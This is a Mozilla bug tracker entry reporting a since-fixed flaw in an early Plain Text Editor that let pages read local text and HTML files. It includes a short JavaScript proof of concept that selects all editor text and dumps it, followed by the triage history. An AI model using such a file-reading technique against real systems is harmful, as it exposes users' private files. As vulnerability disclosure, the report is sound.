Closed
Bug 11527
Opened 26 years ago
Closed 26 years ago
Plain Text Editor allows reading text and parsed HTML files
Categories
(Core :: Security, defect, P3)
Tracking
()
VERIFIED
FIXED
M13
People
(Reporter: joro, Assigned: norrisboyd)
References
()
Details
There is a security vulnerability in Mozilla 5.0 M8 (later builds are also
affected)
which allows reading local text and parsed HTML files using the Plain Text
Editor.
The idea is opening the editor, selecting all the text and accessing the
selected text.
In downloaded TextEditorAppShell.xul is added:
function DumpFile()
{
EditorSelectAll();
dump("-----Begin C:\\TEST.TXT\n");
dump(editorShell.editorSelection.getRangeAt(0).toString());
dump("\n-----End C:\\TEST.TXT\n");
}
setTimeout("DumpFile()",5000)
Demonstration is available at:
http://www.nat.bg/~joro/mozilla/editor/editor.html
| Assignee | ||
Updated•26 years ago
|
Status: NEW → ASSIGNED
| Assignee | ||
Updated•26 years ago
|
Target Milestone: M11
| Assignee | ||
Updated•26 years ago
|
| Assignee | ||
Comment 1•26 years ago
|
||
Move security bugs from M11 to M13; needed for beta but not for dogfood.
| Assignee | ||
Updated•26 years ago
|
Status: ASSIGNED → RESOLVED
Closed: 26 years ago
Resolution: --- → FIXED
| Assignee | ||
Comment 2•26 years ago
|
||
XPAppCoresManager finally died, closing this security hole.
Bulk moving all Browser Security bugs to new Security: General component. The
previous Security component for Browser will be deleted.
| Comment hidden (collapsed) |
You need to log in
before you can comment on or make changes to this bug.
Description
•